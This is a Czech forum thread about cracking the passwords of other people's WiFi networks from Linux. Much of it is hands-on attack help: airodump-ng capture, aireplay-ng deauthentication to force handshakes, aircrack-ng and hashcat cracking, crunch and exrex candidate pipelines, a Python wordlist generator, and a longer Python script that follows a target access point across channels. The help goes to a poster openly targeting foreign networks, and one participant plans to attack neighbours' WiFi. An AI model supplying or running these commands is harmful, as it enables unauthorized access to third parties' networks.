Fórum Root.cz
Hlavní témata => Sítě => Téma založeno: kareltomas 02. 12. 2019, 19:10:30
-
Zkoušeli jste prosím někdo prolomit přes Linux heslo do cizí wifi? Na netu je spousty youtube videí, ale podle mě jsou všechna "podstrčená", kdy daný moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku a ten daný slovník otevře a kuk, heslo bylo prolomeno.
-
Zkoušeli jste prosím někdo prolomit přes Linux heslo do cizí wifi? Na netu je spousty youtube videí, ale podle mě jsou všechna "podstrčená", kdy daný moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku a ten daný slovník otevře a kuk, heslo bylo prolomeno.
Stručně: cizí WiFi zcela jistě prolomit lze, ale ani zdaleka ne vždy.
Podrobně se rozepisovat nemá cenu (soudě podle titulku a úrovně dotazu)...
-
Na U-trubce je spousta clickbaitu, o tom žádná.
Slovníkový útok hrubou silou může být dost rychlý v případě, že daná síť používá slovníkové heslo. Přesto to spíš nebude "lup a hotovo", pokud musí probíhat reálné autentikační transakce, protože zamítavá reakce naschvál chvíli trvá apod. Jo pokud by se útočník dostal k autentikační databázi (/etc/shadow apod. - prostě k hashům) a mohl je louskat offline, potom lze hesla zkoušet hodně rychle.
Pokud odhlédneme od slovníkových útoků hrubou silou, tak je taky rozdíl mezi různými autentikačními mechanismy. Starý WEP měl dost slabé šifrování, v dnešní době je považován za bezpečnostní díru. WPA2 je o dost odolnější. Údajně se nakonec dá taky lousknout "krytografickou hrubou silou", pokud člověk odposlechne a zaznamená dostatečný objem provozu (řádově hodiny při plném vytížení, pokud se nepletu) - tzn. opět to není "lup a hotovo".
Zajímavá díra je "WPS (https://routersecurity.org/wps.php)" v režimu zabezpečení PINem. Sice osmimístné číslo, ale reálně degradované asi na 4 číslice (11000 kombinací). I tak trvá řádově několik hodin, než je všechny vyzkoušíte.
A pak je taky fakt, že Windowsy mají hesla k wifi sítím uložená tak, že se k nim lze dostat prakticky obratem. Dřív na to býval nějaký pokoutní soft, dneska to lze údajně zjistit standardním příkazem na příkazové řádce (https://fossbytes.com/find-wifi-password-connected-networks-cmd-windows/)... a to je skutečně "lup a hotovo". Tzn. tady je počítač k síti už připojený, jenom to heslo potřebujete zjistit (např. kvůli dalšímu stroji, aby se dostal taky na wifinu).
-
Z mých poznámek (slovníkový, příp. u hashcatu kombinační -- asi se vyplatí zkusit všechna 8místná čísla, jinak nevím):
- iwlist scan, protože pak už to v monitor mode nepůjde
- airmon-ng start wlan0 - vytvoří wlan0mon
- airodump-ng wlan0mon --bssid XX:XX:XX:XX:XX:XX --channel 8 --write /tmp/wifi
- volitelně aireplay-ng -0 1 -a MAC_AP -c MAC_KLIENT wlan0mon (deauth)
- aircrack-ng /tmp/wifi-01.cap -w /tmp/wordlist.txt
- nebo ./hashcat-utils/src/cap2hccapx.bin /tmp/wifi-01.cap /tmp/wifi.hccapx; ./hashcat -m 2500 -a 0 /tmp/wifi.hccapx /tmp/wordlist.txt
A existuje na to "wifite" aby člověk nemusel furt kopírovat ty MAC adresy a čísla kanálů.
frr: Handshake se dá vynutit pomocí deautentizace („odpojení“), protože tento paket je ve WPA2 nepodepsaný a můžeš ho zfalšovat pokud znáš MAC adresu AP a klienta (což odposlechneš). Klient se automaticky zkusí připojit znova a máš handshake. Útok je pak offline, je tam středně těžká PBKDF2 se SHA. /etc/shadow u wifi? Pasivní kryptografický útok na WPA2? O čem to mluvíš?!
A heslo, nebo přinejhorším jeho hash osolený SSID sítě (což je to co se ve skutečnosti používá jako kryptografický materiál) musí mít dostupný každý klient, je úplně jedno jestli Windows nebo wpa_supplicant. WPA2 (Personal) je symetrické… (a i kdyby nebylo, tak bych chtěl vidět protokol, který zajistí, že klienta nejde naklonovat)
A jinak co se týče WPA2-Enterprise, tak tam MITM na ten TLS kanál (drtivá většina klientů nebude ověřovat certifikát, protože je překvapivě komplikované to nastavit) a pak prolomit MSCHAPv2 hrubou silou (DES) nebo možná jsou na to rainbow tabulky (na něco jsou, viz crack.sh).
-
Sice bez linuxu, ale zato ze života:
Měl jsem na chvíli fyzický přístup k routeru, takže jediný problém byl vybrat si z té spousty možností (vyfotit si router zespodu kde je WPS PIN; nebo ťuknout do WPS tlačítka; připojit se na drátěný ethernet za routerem a zkusit konfiguraci; ...)
Použil jsem WPS tlačítko a android mobil a po připojení jen tak pro legraci nakliknul http://192.168.1.1/ konfiguraci routeru, kde jsem si přečetl heslo. Nedělám si srandu, za minutku hotovo. (Router patří kamarádovi, používám ho legálně. Když změnil heslo a nebyl v dosahu, bylo jednodušší se tam nakliknout a říct mu to až pak. Zabezpečení doteď nepořešil...)
Je spousta postranních cestiček. Nelámej hned hesla, hledej, lidi je sami nabízejí :D někdy stačí fotka z fejsbůku s heslem na monitoru...
-
[...] WPA2 je o dost odolnější. Údajně se nakonec dá taky lousknout "krytografickou hrubou silou"[...]
u WPA2 bude rozdil zda jde o WPA2-TKIP (podobne WEP) nebo WPA2-CCMP/AES a taky zda bude/nebude vynucene jen to druhe, nebo povolene obe varianty...
-
Mám ještě prosím dotaz na "- iwlist scan, protože pak už to v monitor mode nepůjde". Co mám chápat jako ten iwlist scan????? ;-) Je tím myšlen slovník? Díky za odpověď.
-
Mám ještě prosím dotaz na "- iwlist scan, protože pak už to v monitor mode nepůjde". Co mám chápat jako ten iwlist scan????? ;-) Je tím myšlen slovník? Díky za odpověď.
https://linux.die.net/man/8/iwlist
Na některých distribucích není a je tam iw -- iw dev wlan0 scan
-
Mám ještě prosím dotaz na "- iwlist scan, protože pak už to v monitor mode nepůjde". Co mám chápat jako ten iwlist scan????? ;-) Je tím myšlen slovník? Díky za odpověď.
iwlist je nástroj na scanování wifi sítí ;) napiš si do terminálu
man iwlist
;D ;D ;) ;)
..................
https://linux.die.net/man/8/iwlist
Na některých distribucích není a je tam iw -- iw dev wlan0 scan
kareltomáš má kali 2020 nóó a tam iwlist je :D ;)
-
Je to presne tak ako píšeš. => moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku...
Na lámanie hesiel, ktoré v slovníku nie sú je potrebné si zaplatiť výpočtový čas na super počítači, alebo k tomuto účelu využívaných výpočtových farmách.
-
Tak ono by to youtube video trvalo 10 hodin, kdyby se zkoušelo víc možností(třeba všechny) (zkratkovitě řečeno).
Ve skutečnosti taky nehádáš wifi heslo bruteforcí všema kombinacema... Vždy musíš mít nějak určené jaké kandidáty budeš zkoušet jinak bys to lámal roky. Někde to je slovník, kombinace slovníků (něco jako kartágský součin, nevýhoda je, že se z milionu kandidátů stane milion milioónů a to už mezitím se vyplatí vyjet na dovolenou do zahraničí než ti se ti v terminálu objeví SIGALRM že došlo k nalezení hesla), generátory, slovník s pravidlama a doufáš že to jednou vyjde.
-
Existují i hotové scripty https://github.com/derv82/wifite2 , kartu stačí přepnout do monitor modu a vybírat nadefinované funkce. A k prolomení stačí pár drobných BTC.
(https://camo.githubusercontent.com/1ac7a9a3b31777f65e7350c5b1d9c63d3cfea1b4/68747470733a2f2f692e696d6775722e636f6d2f4352386f4f70302e676966)
-
Přemýšlím, jak chápat "připomínku" od uživatele johanson14, který uvádí "Je to presne tak ako píšeš. => moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku...". Mám to chápat, že mám pomocí příkazů již slovník vytvořený, ze skenované sítě???? V tom zase bude něco jednoduchého, ale nechytám se.... :-( :-( Beztak mi uživatelka "Wrána diskuze" odpoví jedním slovem :-) :-) :D
-
Logika hovorí, že nieje možné náhodne získať heslo do niekoľkých minút tak ako je to uvedené na YT, teda určite nie stýlom á'la poďme sa pripojiť. Možno je ale možné otvoriť šifrovanú komunikáciu, aspoň sa mi marí, že som niekde videl PoC. Kde to bolo si nepamätám, ale tipujem, že google by to vedel.
-
Logika hovorí, že nieje možné náhodne získať heslo do niekoľkých minút tak ako je to uvedené na YT
Já jsem takto hesla do wifi sítí už několikrát získal. Jednalo se třeba o hesla (změněno, ale invence toho, kdo je vymyslel, je stejná) ADAMADAM nebo eee54321. Taková hesla lze najít ve slovnících nebo vygenerovat jednoduchými pravidly, hashcat si s tím poradí snadno. Osobně používám slovník https://github.com/berzerk0/Probable-Wordlists a pak jeden specializovaný český, který bohužel nemohu sdílet. Nevím, o jakém videu se bavíte, na animovaném gifu v této diskuzi je uvedeno heslo "la bamba", což je mrzuté, protože mám slovník bez mezer, každopádně heslo la-bamba mám na pozici 56237371 a heslo la_bamba na pozici 70869507. Grafická karta by milion pokusů za sekundu mohla zvládnout (WPA-2 má poměrně pomalý algoritmus, ostatní věci to crackuje klidně miliardu pokusů za sekundu), takže získání uvedených hesel by trvalo minutu.
-
Podrobně se rozepisovat nemá cenu (soudě podle titulku a úrovně dotazu)...
;)
-
evidentně odborník :D
-
@Jenda
=> Já jsem takto hesla do wifi sítí už několikrát získal....
Myslím, že hovoríme o heslách, ktoré niesú v slovníku, alebo mi niečo ušlo? Tiež sa dá predpokladať, že lámač hesiel zrejme myslí také, ktoré sa nedajú generovať jednoduchými pravidly.
-> WPA-2 má poměrně pomalý algoritmus...
Na túto skutočnosť bol práve zameraný ten PoC, ktorý som v minulost niekde videl. Komunikáciu bolo možné otvoriť na dobu do výmeny klúčov, potom to bolo nutné znova spočítať. Obranou pred týmto bolo potrebné nastaviť rekeying na menšiu dobu ako býva štandardne nastavená.
-
Přemýšlím, jak chápat "připomínku" od uživatele johanson14, který uvádí "Je to presne tak ako píšeš. => moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku...". Mám to chápat, že mám pomocí příkazů již slovník vytvořený, ze skenované sítě???? V tom zase bude něco jednoduchého, ale nechytám se.... :-( :-( Beztak mi uživatelka "Wrána diskuze" odpoví jedním slovem :-) :-) :D
slovník takle jednoduše nevyrobíš ten si asi jako musíš vodněkud stáhnout :D :) :) ;)
třeba z toho jendovýho githubovýho vodkazu hele (https://github.com/berzerk0/Probable-Wordlists/blob/master/Downloads.md)
nějaký volně dostupný český wordlisty sou tady hele (https://www.soom.cz/?name=download/kategorie&sid=30)
nóó nebo z nějakejch temějších koutků internetu ;D ;D ;) ;) nevim jestli mužu uplně přesně menovat nóó ale třeba na takový ty stránce s takovou pirátskou lodičku navobrázku kde si hodný lidi mezi sebou zadarmo pučujou seriály nebo filmy de taky nějaký ty wordlisty (ne český) stáhnout. zátoka nějaká se to menuje ;D ;D ;D ;D ;) ;)
btw johanson asi jako vodpovídal na uplně tvuj první dotaz z 2.12.2019 hele (https://forum.root.cz/index.php?topic=22176.msg321553#msg321553) :) ;)
-
Je to už dost let z5 co se mi lousknou lokálního providera podařilo. Co si pamatuji tak jsem na to použil nějké spaciální disto ale hlavně to chtělo wifinu spaciální. a tou byla netgear wn111v2. Jedině s tou to šlo, ta má cosi odemčené..ale jak jsem to už dělal si nepamatuju..
-
Zkoušeli jste prosím někdo prolomit přes Linux heslo do cizí wifi? Na netu je spousty youtube videí, ale podle mě jsou všechna "podstrčená", kdy daný moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku a ten daný slovník otevře a kuk, heslo bylo prolomeno.
Pěkné téma :-)
Ale když máme tu COVID sezónu...
Existuje distribuce Kali Linux, která má hromadu nástrojů nejen pro WiFi.
Pro tento účel existuje seznam doporučených karet pro danou distribuci.
Ano na youtube mají vše připravené dopředu, zprostředkují jen postup.
WPS PIN je problém a otevřená vrátka. Slušní výrobci dodávají zařízení s touto funkcí vypnutou nebo nechávají jen tlačítko.
Případný úspěch či neúspěch bude zavislý na daném zařízení a člověku, který ho spravuje.
Ze zkušeností z návštěv u známých na to většina lidí kašle a nastaví něco co je zapamatovatelné.
Obecně dnešní programy dokáží prolomit heslo typu M0j3D0mAc1W1F1 a to načtením slovníku a vygenerování různých variant kdy místo písmenka doplní číslo a provedou jiné transformace.
Avšak na heslo typu l77S48Ew$`rD|$U;|cdH4Q$gvulphPqkN66?s^Y6Rj to aplikovat moc nepůjde a případné nalezení bude dílo náhody.
U WPA2-AES-PSK došlo k usnadnění díky PKMID. Nicméně toto lze u chytřejších zařízení vypnout.
Co se týče deauth tak k velké škodě je velmi málo zařízení, které umí protected management frames (jak AP tak klient).
WPA2-EAP-TLS - Pokud se ověřují obě strany vůči sobě certifikátem tedy i klient má vynucené ověření protější strany pak takřka nemáš šanci v době psaní tohoto příspěvku.
WPA2-EAP-TTLS - To už je trochu jiný příběh ale pořad lepší než PSK.
Pokud někomu instaluji domácí WiFi tak samozřejmě nepočítám s tím, že si dotyčný bude generovat certifikáty a dělat jejich správu. Od doby kdy existuje nativní podpora QR codes pro nastavení WiFi mi moc nedává smysl proč si lidé nevygenerují silné náhodné heslo, vytisknou QR Code a přilepí třeba na lednici. Navíc QR code umí vygenerovat i mobilní telefon ze kterého se to dá ukázat návštěvě/další členům domácnosti.
Což mě přivádí k myšlence teoretického útoku v husté zástavbě kde dalekohledem/foťákem koukáš sousedům přes okno a hledáš lednici zda tam nevisí papírek s heslem k WiFi....;-)
Závěrem, pokus o neoprávněné zneužití prostředků třetí strany v tomto kontextu bude s největší pravděpodobností v konfliktu s právní úpravou ČR. Dotčená strana musí s tímto činem souhlasit tedy např. objednávkou penetračních testů.
Příspěvek není nabádání k tomuto konání a autor doporučuje tyto pokusy provádět jen na zařízeních, které zadavatel přísvěvku vlastní nebo na zařízeních u kterých dotčená strana s tímto jednáním souhlasí.
-
Zrovna rozbaluji kali linux pro rpi zerow, bydlím v paneláku kde je těch wifi hafo k výběru..budu postupovat podle tohoto návoduhttps://www.youtube.com/watch?v=jdtsluz4hC4 (https://www.youtube.com/watch?v=jdtsluz4hC4)
-
Heslo k WiFi je 7+7 stejných číslic. Když si vygeneruji přes crunch všechny kombinace 7 číslic, tak heslo nenajde.
Netušíte, jestli by nějak nešlo zadat v aircrack-ng, aby zkoušel 7+7 stejných číslic a nemusel jsem generovat kombinace pro 14 číslic (což už by zabralo hromadu místa).
-
Heslo k WiFi je 7+7 stejných číslic. Když si vygeneruji přes crunch všechny kombinace 7 číslic, tak heslo nenajde.
Netušíte, jestli by nějak nešlo zadat v aircrack-ng, aby zkoušel 7+7 stejných číslic a nemusel jsem generovat kombinace pro 14 číslic (což už by zabralo hromadu místa).
mužeš to spojit trubičkou | nóó a pak se nic na disk zapisovat nebude a rovnou se to bude strkat do aircracku hele (https://coders.ph/post/how-to-use-aircrack-ng-to-bruteforce-wpa2-passwords) :o ;)
příklad z jejich stránek
crunch 8 8 0123456789 -s 70000000 | aircrack-ng -w - -b AA:BB:CC:DD:00:11 /path/to/handshake.cap
crunch boužel asi neumí nějaký složitější patterny :o :( víc lepšejší mi jako připadá nástroj exrex hele (https://github.com/asciimoo/exrex) kterej umí jakoby vygenerovat všecky možný kombinace znaků který muže zachytit danej regulární výraz. v tvým případě pro generování hesel 7 stejnejch čísel + 7 stejnejch čísel takle nějak :D ;)
exrex '(\d)\1{6}(\d)\2{6}' | aircrack-ng blablablah
-
To by bylo úžasné a byl bych ti vděčen, kdyby ten exrex fungoval, protože místo na vygenerovaný wordlist 'crunch 14 14 1234567890' vůbec nemám.
Hledal jsem 'crunch aircrack-ng example' a ta spojovací roura mi docvakla až pozdě.
Zkoušel jsem 'crunch 7 7 1234567890 | crunch 7 7 1234567890 | aircrack-ng -e ssid -w - /home/user/ssid.cap', což je blbost, protože to hned zkolabuje a hlavně by to nezaručilo 2x stejné čísla. Hlavně aircrack-ng musí dostat minimálně 8 znaků, jinak se ukončí.
Jdu to ukusit s tím exrex.
Edit: Asi jsem to napsal blbě, ale kdyby bylo heslo 25489762548976, tak jak by vypadal příkaz do toho exrexu?
-
Jsem z toho pako, tohle exrex '\d{7}\d{7}' je to samé jako exrex '\d{14}'. Už jsem do tohodle exrex '\d{7}\d{7}' zkoušel dávat závorky nebo rouru a nic
-
Už jsem na to přišel exrex '([1-9]{7})\1', když vidím ty všelijaké lomítka a závorky, tak z toho mám mlhu ;D
-
Už jsem na to přišel exrex '([1-9]{7})\1', když vidím ty všelijaké lomítka a závorky, tak z toho mám mlhu ;D
supr :D
regexpy taky furt strkám do googlu ;D ;D ;) ;) celkem praktický se mi zdá todleto webový ide hele (https://regex101.com/) ;)
...............Zkoušel jsem 'crunch 7 7 1234567890 | crunch 7 7 1234567890 | aircrack-ng -e ssid -w - /home/user/ssid.cap'.............
crunch s crunchem trubičkou spojit nejde :-\ ;)
to dvojitý číselný heslo by šlo kdyby se jakoby vždycky zdvojil výstupní string třeba takle nějak
crunch 7 7 0123456789 | while read i; do echo $i$i; done | aircrack
bashový lidi možná znaj nějakej lepšejší způsob než jak sem to napsala já :o :)
noa ještě kdyby ti ani tamten exrex nestačil tak si furt mužeš napsat nějakej svuj skriptík
#!/usr/bin/env python3
pswd_len = 7
opakovani = 2
for i in range(10**pswd_len):
heslo = str(i)
heslo = (pswd_len - len(heslo)) * '0' + heslo
print(heslo * opakovani)
a strčit ho do aircracku tou trubičkou :D ;)
/nejaka/cesta/josefuv_skript.py | aircrack
-
Jestli se ti doma válí nějaké raspberry pi, tak https://pwnagotchi.ai/ v kombinaci s pluginy onlinehashcrack.py a wpa-sec.py dovede vcelku dost. Samozřejmě je třeba všechno zablacklistovat a testovat jen na vlastní wifi...
edit: na pozadí to používá tohle https://www.bettercap.org/ což můžeš normálně nainstalovat na libovolném linuxu a handshakama nakrmit hashcat a nebo ty dvě služby sám. Pro hračičky je ale lepší varianta s rpi zero a eink displejem ;-)
-
nejlepší hesla jsou obyčejná na které je každý slovník krátký a které si zapamatujete, stačí jen vědět jak.
tak například slova z nářečí-viz film "Kód Navajo" ..tak třeba "šutrovákobzola" nebo "šalínanaprýgl" a zkuste na to přijít.
Ale teď ty skutečné založené na čísle, znaku a písmenech.
dnes je : 16.11.2020
tak tedy např. : "16.lIStopadu2020"
kdyby bylo 6.12.2020 - "06.pROsince2020"
do kalenáře pak stačí udělat barevnou tečku abych si i po dovolené pamatoval co za heslo tam mám. Hodí se to na systémy kdy se heslo mění každých 72 dní (např.) a když těch systémů máte v práci několik a mění se v různé dny pak může mít i víc hesel a nebo je ujednotit k jednomu datumu.
-
mi moc nedává smysl proč si lidé nevygenerují silné náhodné heslo, vytisknou QR Code a přilepí třeba na lednici. Navíc QR code umí vygenerovat i mobilní telefon ze kterého se to dá ukázat návštěvě/další členům domácnosti.
Dříve jsem se snažil být chytroprd a měl jsem doma jako wifi heslo 63 náhodných znaků. Myslel jsem si, že ta trocha nepohodlí stojí za vyšší zabezpečení (wifi je v bytovém domě).
A po pár letech jsem uznal, že to nejde. Televize, tiskárny a další podobné zařízení se mění častěji, než člověk čeká a zadat tam 63 náhodných znaků je v podstatě nemožný úkol. To, že mobily umí načíst heslo z QR kódu je strašně hezké, ale neřeší to hromadu zařízení, kde se to musí dělat nesmírně komplikovaně.
-
když už budu chtít zabezpečit wifi v paneláku v Praze (kde bydlím) tak použiju radius a ať si každý člen domácnosti zvolí vlastní heslo (třeba ten radius co mám na nas synology) a skryju ssid..a ať se mi tam někdo snaží dostat....jo a základ..moje rodina s mobilama a s tabletama se snaží dostat do internetu..když notebook tak do sítě aby se dostali na tiskárnu. ale i u tiskárny mohu zapnout wifi direct a umožnit jim tisknout jen se znalostí hesla. a ani tam se mi nedostane šmejd kdby chtěl.
-
Doma používám hostapd + freeradius a webUI daloradius (http://daloradius.com).
-
no já si teď na synology nastavil ldap server a radius server, musím se ještě rodiny zeptat večer co všechno připojují na wifi a nastavit do ldapu účty i pro mobily a tablety...no a mikrotik (až doma nastavím cAP ac) tak to spustím i na mikrotiku...a každé zařízení bude mít své přístupové heslo..a ať se někdo snaží to lousknout...
-
když už budu chtít zabezpečit wifi v paneláku v Praze (kde bydlím) tak použiju radius a ať si každý člen domácnosti zvolí vlastní heslo (třeba ten radius co mám na nas synology) a skryju ssid..
Zajímavá kombinace. Na jednu stranu doma řešit radius. A na druhou stranu dělat tak zbytečnou věc, jako skrývání ssid.
-
nejlepší hesla jsou obyčejná na které je každý slovník krátký a které si zapamatujete, stačí jen vědět jak.
tak například slova z nářečí-viz film "Kód Navajo" ..tak třeba "šutrovákobzola" nebo "šalínanaprýgl" a zkuste na to přijít.
nóó obyč slovník nato asi jako fakt bude krátkej ale pořád takový slovíčka respektujou různý češtinový pravidla jakože se často střídaj souhlásky a samohlásky v určitejch frekvencích nebo žeje poslepovaný z různejch platnejch slabik danýho jazyka :) ;)
a vubec mezi večinou všech možnejch hesel určitě jako bude nějaká pravidelnost a asi by byl zajímavej pokus si ty hesla zkusit z velikánskýho korpusu uniklejch generovat neuronovou sítí :D ;)
-
stačí slovo který nazná nikdo na světě a ještě s chybou " pyča.....
-
Když sem takhle vpluju jak orel napole bez varování, umí hashcat nějak rozumně kombinovat slovníky (za účelem skládání slov než vpočtu 2) ?
Má sice možnost použít 2 slovníky jako kartézskýsoučin, (nějaká hodnota parametru -a) ale 2 slova jsou málo a pak si ani nejsem jistý jestli v tomto režimu umí třeba aplikovat pravidla (-r) , například dát mezery mezi slova a neboříct,aby na první a poslední slovo použil nějaké pravidlo
Nebo se musí zvolit externí generátor kombinací (ne nutně lamersky si kombinace vygenerovat do souboru)?
-
Když airodump-ng skenuje pouze jeden kanál a jedno AP (-c 5 --bssid 12:34:56:78:90:AB) a to sledované AP přeskočí na jiný kanál, tak od něj přestanou chodit beacon a spadne RXQ.
Umí v tuto chvíli airodump-ng toto AP vyhledat a zůstat na přeskočeném kanále? Nebo máte tip na script, který by to řešil?
Určitě nechci skenovat všechny kanály, nebo třeba -c 1-11.
-
stačí slovo který nazná nikdo na světě a ještě s chybou " pyča.....
'py' i 'ča' najdeš mezi platnejma českejma slabikama ;D ;)
nóó a když budeš jakoby brát slovíčka z různejch internetovejch diskuzí tak tam na takový slovíčko narazíš brzy určitě ;D ;D
Když sem takhle vpluju jak orel napole bez varování, umí hashcat nějak rozumně kombinovat slovníky (za účelem skládání slov než vpočtu 2) ?
Má sice možnost použít 2 slovníky jako kartézskýsoučin, (nějaká hodnota parametru -a) ale 2 slova jsou málo a pak si ani nejsem jistý jestli v tomto režimu umí třeba aplikovat pravidla (-r) , například dát mezery mezi slova a neboříct,aby na první a poslední slovo použil nějaké pravidlo
Nebo se musí zvolit externí generátor kombinací (ne nutně lamersky si kombinace vygenerovat do souboru)?
v hashcat-utils je nějakej kombinátor kterej by měl umět vyrobit slovník až ze tří různejch ale nevim nezkoušela sem :o :o
vobyč kombinátor by jako měl umět dělat kombinování pravidel + dvou slovníků hele (https://hashcat.net/wiki/doku.php?id=combinator_attack) ale furt jeto jakoby+- generování slovníku předem takže asi jako ne uplně to co bys jako potřeboval ??? :(
Když airodump-ng skenuje pouze jeden kanál a jedno AP (-c 5 --bssid 12:34:56:78:90:AB) a to sledované AP přeskočí na jiný kanál, tak od něj přestanou chodit beacon a spadne RXQ.
Umí v tuto chvíli airodump-ng toto AP vyhledat a zůstat na přeskočeném kanále? Nebo máte tip na script, který by to řešil?
Určitě nechci skenovat všechny kanály, nebo třeba -c 1-11.
si myslim že airodump sám vo sobě nato je moc tupej :o :( leda asi jako parsovat výstup toho airodumpu a hlídat když se přestanou ty beacony voběvovat noa pak killnout udělat scan podle původní bssid najít novej kanál a pustit chytání znova :o :o
nadruhou stranu je takový dost nepravděpodobný že se ten kanál bude měnit nějak moc často noa když by se někdo bránil tak by asi taky jako moh změnit mac a essid a vubec natebe vlítnout s pohrabáčem v ruce ;D ;D ;) ;)
-
Zkoušeli jste prosím někdo prolomit přes Linux heslo do cizí wifi? Na netu je spousty youtube videí, ale podle mě jsou všechna "podstrčená", kdy daný moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku a ten daný slovník otevře a kuk, heslo bylo prolomeno.
Oznacovat nieco za konspiraciu, len na zaklade vlastnej nevedomosti je hlupe.
-
Když airodump-ng skenuje pouze jeden kanál a jedno AP (-c 5 --bssid 12:34:56:78:90:AB) a to sledované AP přeskočí na jiný kanál, tak od něj přestanou chodit beacon a spadne RXQ.
Umí v tuto chvíli airodump-ng toto AP vyhledat a zůstat na přeskočeném kanále? Nebo máte tip na script, který by to řešil?
Určitě nechci skenovat všechny kanály, nebo třeba -c 1-11.
už mě to jako vomrzelo takže si dodělej sám ;D ;)
za chyby a prasečiny neručim ;D ;)
#!/usr/bin/env python3
import sys
from subprocess import Popen, PIPE
import re
import time
import logging
# mac adresa cílený
target_bssid = '01:23:45:67:89:AB'
# prefix zapisovanejch *.cap souborů a podobnejch
wr_prefix = 'chyceno'
# monitorovovací interface
interface = '0mon'
# minimální rate beaconů za seknudu
# když naměřenej rate klesne pod tudletu hodnotu tak si jako myslíme že
# ta naše stanice zmenila kanál z nějakýho důvodu :D ;D
min_rate = 5.0
# interval v sekundách ve kterým jakoby ždycky spočitáme aktuální beacon rate
min_delta = 10.0
# příkazy airodumpu
# první pro záznam druhej pro hledání toho kanálu
cmd_rec = ['airodump-ng', '--write', wr_prefix, '--bssid', target_bssid,'-c', None, interface]
cmd_ch = ['airodump-ng', '--bssid', target_bssid, interface]
# jak jako vypadá řádek tabulky pod kterým sou jakoby vypsaný jednotlivý stanice připojený
# uplně horní řádek tabulky vypadá pro voba ty naše různý příkazy různě :O :O
stations_header = b'\x1b[0K\x1b[1B BSSID STATION PWR Rate Lost Frames Notes Probes\x1b[0K\n'
def dump():
table_header = b'\x1b[0K\x1b[1B BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID\x1b[0K\n'
is_bssid_row = False
beacons_delta = 0
last_sum_beacons = 0
last_time = 0.0
rate = 0.0
proc = Popen(cmd_rec, stdout=PIPE)
time.sleep(1)
for line in proc.stdout:
t = time.time()
dt = t - last_time
if dt > min_delta:
if is_bssid_row:
if not line == stations_header:
blocks = re.split(r'\s+', line.decode('utf8'))
block = blocks[4]
try:
sum_beacons = int(block)
except ValueError:
# když neni stringem s číslem uvnitř
continue
beacons_delta = sum_beacons - last_sum_beacons
last_time = t
last_sum_beacons = sum_beacons
if dt != 0:
rate = beacons_delta / dt
print(rate)
if rate < min_rate:
proc.kill()
break
is_bssid_row = False
if( line == table_header):
is_bssid_row = True
if line == table_header:
ln = f'\n beacons/s: {rate:.2f} delta: {beacons_delta} sum:{last_sum_beacons}\n\n'
ln = bytes(ln, 'utf-8')
sys.stdout.buffer.write(ln)
sys.stdout.buffer.write(line)
sys.stdout.buffer.flush()
proc.stdout.close()
proc.wait()
def find_channel():
# liší se :O :O
# stanice maj stejnej jako předtim
table_header = b'\x1b[0K\x1b[1B BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID\x1b[0K\n'
chann_num = -1
is_bssid_row = False
proc = Popen(cmd_ch, stdout=PIPE)
time.sleep(1)
for line in proc.stdout:
if is_bssid_row:
if not line == stations_header:
blocks = re.split(r'\s+', line.decode('utf8'))
print(blocks)
try:
chann_num = int(blocks[6])
proc.kill()
break
except ValueError:
# když neni stringem s číslem uvnitř
continue
is_bssid_row = False
if( line == table_header):
is_bssid_row = True
sys.stdout.buffer.write(line)
sys.stdout.buffer.flush()
proc.stdout.close()
proc.wait()
return chann_num
if __name__ == '__main__':
logging.basicConfig(filename='airodumpovadlo.log', format='%(asctime)s %(message)s', level=logging.DEBUG)
while True:
logging.info('hledá se kanál BSSID == ' + target_bssid)
chann_num = find_channel()
logging.info(f'našel se kanál: {chann_num}')
cmd_rec[6] = str(chann_num)
dump()
logging.info('dump zkončil')
print('hotovo!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!§')
Zkoušeli jste prosím někdo prolomit přes Linux heslo do cizí wifi? Na netu je spousty youtube videí, ale podle mě jsou všechna "podstrčená", kdy daný moderátor dávno heslo zná a pouze jej má ve výsledku ve slovníku a ten daný slovník otevře a kuk, heslo bylo prolomeno.
Oznacovat nieco za konspiraciu, len na zaklade vlastnej nevedomosti je hlupe.
náhodou to je dobrej vodhad si taky jako myslim že ty videjka sou podvod :o :D :D ;)
-
Děkuji ti moc Wráno, hned zítra to otestuji a případně se pokusím o dodělání, což v mém případě bude oříšek ;)